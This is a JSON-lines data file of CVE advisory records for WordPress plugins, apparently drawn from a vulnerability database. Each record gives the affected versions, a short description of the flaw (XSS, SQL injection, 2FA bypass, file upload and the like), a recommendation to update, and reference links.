{"CVE_ID":"CVE-2024-1294","slug":"sunshine-photo-cart","versionImpact":"3.0.24","versionEndExcluding":"3.1","description":"The Sunshine Photo Cart: Free Client Galleries for Photographers plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.24 via the 'invoice'. This makes it possible for unauthenticated attackers to extract sensitive data including customer email and physical addresses.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da76d034-3e9a-4f3f-a314-48e776028369?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da76d034-3e9a-4f3f-a314-48e776028369?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sunshine-photo-cart\\\/tags\\\/3.0.24\\\/includes\\\/admin\\\/sunshine-order.php#L894\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sunshine-photo-cart\\\/tags\\\/3.0.24\\\/includes\\\/admin\\\/sunshine-order.php#L894\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033429\\\/sunshine-photo-cart\\\/trunk\\\/includes\\\/admin\\\/sunshine-order.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033429\\\/sunshine-photo-cart\\\/trunk\\\/includes\\\/admin\\\/sunshine-order.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11952","slug":"classic-addons-wpbakery-page-builder-addons","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The Classic Addons \u2013 WPBakery Page Builder plugin for WordPress is vulnerable to Limited Local PHP File Inclusion in all versions up to, and including, 3.0 via the 'style' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, and permissions granted by an Administrator, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. The vulnerability is limited to PHP files in a Windows environment.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classic-addons-wpbakery-page-builder-addons\\\/tags\\\/3.1\\\/addons\\\/testimonial-slider-item\\\/testimonial-slider-item.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classic-addons-wpbakery-page-builder-addons\\\/tags\\\/3.1\\\/addons\\\/testimonial-slider-item\\\/testimonial-slider-item.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9645b17e-6a7c-4cdd-ae43-7d2c84b624cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9645b17e-6a7c-4cdd-ae43-7d2c84b624cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2685","slug":"tablepress","versionImpact":"3.0.4","versionEndExcluding":"3.1","description":"The TablePress \u2013 Tables in WordPress made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018table-name\u2019 parameter in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/trunk\\\/views\\\/class-all-tables-list-table.php#L242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/trunk\\\/views\\\/class-all-tables-list-table.php#L242\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261229\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261229\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e285849f-886e-49ba-bb43-8c67655fe239?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e285849f-886e-49ba-bb43-8c67655fe239?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9820","slug":"two-factor-login-telegram","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The WP 2FA with Telegram plugin for WordPress is vulnerable to Two-Factor Authentication Bypass in versions up to, and including, 3.0. This is due to the two-factor code being stored in a cookie, which makes it possible to bypass two-factor authentication.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd73030-7185-4302-b3fd-29cbbe716e3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd73030-7185-4302-b3fd-29cbbe716e3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/two-factor-login-telegram\\\/tags\\\/3.0\\\/includes\\\/class-wp-factor-telegram-plugin.php#L228\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/two-factor-login-telegram\\\/tags\\\/3.0\\\/includes\\\/class-wp-factor-telegram-plugin.php#L228\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9687","slug":"two-factor-login-telegram","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The WP 2FA with Telegram plugin for WordPress is vulnerable to Authentication Bypass in versions up to, and including, 3.0. This is due to insufficient validation of the user-controlled key on the 'validate_tg' action. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in as any existing user on the site, such as an administrator.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13b5292f-4484-498b-b6b7-2895871ab794?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13b5292f-4484-498b-b6b7-2895871ab794?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/two-factor-login-telegram\\\/tags\\\/3.0\\\/includes\\\/class-wp-factor-telegram-plugin.php#L244\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/two-factor-login-telegram\\\/tags\\\/3.0\\\/includes\\\/class-wp-factor-telegram-plugin.php#L244\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0279","slug":"media-library-assistant","versionEndExcluding":"3.06","description":"The Media Library Assistant WordPress plugin before 3.06 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/42db1ba5-1b14-41bd-a2b3-7243a84c9d3d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/42db1ba5-1b14-41bd-a2b3-7243a84c9d3d\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/media-library-assistant_3-05_1\",\"name\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/media-library-assistant_3-05_1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1128","slug":"everest-forms","versionImpact":"3.0.9.4","versionEndExcluding":"3.0.9.5","description":"The Everest Forms \u2013 Contact Forms, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to arbitrary file upload, read, and deletion due to missing file type and path validation in the 'format' method of the EVF_Form_Fields_Upload class in all versions up to, and including, 3.0.9.4. This makes it possible for unauthenticated attackers to upload, read, and delete arbitrary files on the affected site's server which may make remote code execution, sensitive information disclosure, or a site takeover possible.","recommendation":"Update to version 3.0.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wpeverest\\\/everest-forms\\\/commit\\\/7d37858d2c614aa107b0f495fe50819a3867e7f5\",\"name\":\"https:\\\/\\\/github.com\\\/wpeverest\\\/everest-forms\\\/commit\\\/7d37858d2c614aa107b0f495fe50819a3867e7f5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wpeverest\\\/everest-forms\\\/pull\\\/1406\\\/files\",\"name\":\"https:\\\/\\\/github.com\\\/wpeverest\\\/everest-forms\\\/pull\\\/1406\\\/files\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237831\\\/everest-forms\\\/trunk\\\/includes\\\/abstracts\\\/class-evf-form-fields-upload.php#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237831\\\/everest-forms\\\/trunk\\\/includes\\\/abstracts\\\/class-evf-form-fields-upload.php#file0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243663\\\/everest-forms#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243663\\\/everest-forms#file7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c04d8c9-acad-4832-aa8a-8372c58a0387?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c04d8c9-acad-4832-aa8a-8372c58a0387?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12621","slug":"yumpu-epaper-publishing","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The Yumpu E-Paper publishing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'YUMPU' shortcode in all versions up to, and including, 3.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yumpu-epaper-publishing\\\/tags\\\/3.0.8\\\/lib\\\/Shortcode.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yumpu-epaper-publishing\\\/tags\\\/3.0.8\\\/lib\\\/Shortcode.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yumpu-epaper-publishing\\\/tags\\\/3.0.8\\\/lib\\\/Shortcode.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yumpu-epaper-publishing\\\/tags\\\/3.0.8\\\/lib\\\/Shortcode.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60c0db19-deda-4b95-a341-cf33883dc9b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60c0db19-deda-4b95-a341-cf33883dc9b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8123","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.0.8 via the duplicate_post function due to missing validation on a user-controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate posts written by other authors including admins. This includes the ability to duplicate password-protected posts, which reveals their contents.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1e421fb-4839-4e2d-911f-e2fa8c756744?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1e421fb-4839-4e2d-911f-e2fa8c756744?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_duplicator\\\/wpext_duplicator.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_duplicator\\\/wpext_duplicator.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8121","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to unauthorized modification of user names due to a missing capability check on the wpext_change_admin_name() function in all versions up to, and including, 3.0.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change an admin's username to a username of their liking as long as the default 'admin' was used.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3d08ac9-22f7-45f4-9896-05b90f5fce64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3d08ac9-22f7-45f4-9896-05b90f5fce64?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_block_user_name_admin\\\/wpext_block_user_name_admin.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_block_user_name_admin\\\/wpext_block_user_name_admin.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8119","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50798706-ad0d-431e-ac5f-57a0606c6f94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50798706-ad0d-431e-ac5f-57a0606c6f94?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_snippets\\\/wp-extend-module-listing.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_snippets\\\/wp-extend-module-listing.php#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8117","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018selected_option\u2019 parameter in all versions up to, and including, 3.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f7f91f6-9fe6-4bbf-ba3c-380ba2e97dcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f7f91f6-9fe6-4bbf-ba3c-380ba2e97dcd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_snippets\\\/wpext_snippets.php#L293\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_snippets\\\/wpext_snippets.php#L293\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8106","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.8 via the download_user_ajax function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including usernames, hashed passwords, and emails.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/593eb5bc-59f9-4944-b147-4ba66d49abe6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/593eb5bc-59f9-4944-b147-4ba66d49abe6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_export_users\\\/wpext_export_users.php#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_export_users\\\/wpext_export_users.php#L54\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8104","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.0.8 via the download_file_ajax function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fad1834-0ee1-4542-a5a7-55a32861c81d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fad1834-0ee1-4542-a5a7-55a32861c81d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/libraries\\\/wpext_export\\\/wpext_export.php#L137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/libraries\\\/wpext_export\\\/wpext_export.php#L137\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8102","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the module_all_toggle_ajax() function in all versions up to, and including, 3.0.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d47df99-cff5-4be7-ab8e-ef333cf3755b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d47df99-cff5-4be7-ab8e-ef333cf3755b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/admin\\\/class-wp-extended-admin.php#L262\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/admin\\\/class-wp-extended-admin.php#L262\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9831","slug":"taskbuilder","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The Taskbuilder WordPress plugin before 3.0.9 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/390baaf8-a162-43e5-9367-0d2e979d89f7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/390baaf8-a162-43e5-9367-0d2e979d89f7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-47386","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit \u2013 WP Extended allows Reflected XSS. This issue affects The Ultimate WordPress Toolkit \u2013 WP Extended: from n\/a through 3.0.8.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpextended\\\/wordpress-wp-extended-plugin-3-0-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpextended\\\/wordpress-wp-extended-plugin-3-0-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12025","slug":"collapsing-categories","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The Collapsing Categories plugin for WordPress is vulnerable to SQL Injection via the 'taxonomy' parameter of the \/wp-json\/collapsing-categories\/v1\/get REST API in all versions up to, and including, 3.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201979%40collapsing-categories&new=3201979%40collapsing-categories&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201979%40collapsing-categories&new=3201979%40collapsing-categories&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05153b11-2f26-425e-99ab-93216861802b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05153b11-2f26-425e-99ab-93216861802b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13125","slug":"everest-forms","versionImpact":"3.0.8","versionEndExcluding":"3.0.8.1","description":"The Everest Forms WordPress plugin before 3.0.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f60a8358-1765-4cae-9c89-0d75c5e394ec\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f60a8358-1765-4cae-9c89-0d75c5e394ec\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13940","slug":"ninja-forms-webhooks","versionImpact":"3.0.7","versionEndExcluding":"3.0.8","description":"The Ninja Forms Webhooks plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.0.7 via the form webhook functionality. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 3.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/ninjaforms.com\\\/extensions\\\/webhooks\\\/\",\"name\":\"https:\\\/\\\/ninjaforms.com\\\/extensions\\\/webhooks\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cf2af62-2b5a-4c0a-9e82-f80dde204a9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cf2af62-2b5a-4c0a-9e82-f80dde204a9d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0441","slug":"simply-gallery-block","versionEndExcluding":"3.0.8","description":"The Gallery Blocks with Lightbox WordPress plugin before 3.0.8 has an AJAX endpoint that can be accessed by any authenticated users, such as subscriber. The callback function allows numerous actions, the most serious one being reading and updating the WordPress options which could be used to enable registration with a default administrator user role.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/11703e49-c042-4eb6-9a5f-6e006e3725a0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/11703e49-c042-4eb6-9a5f-6e006e3725a0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
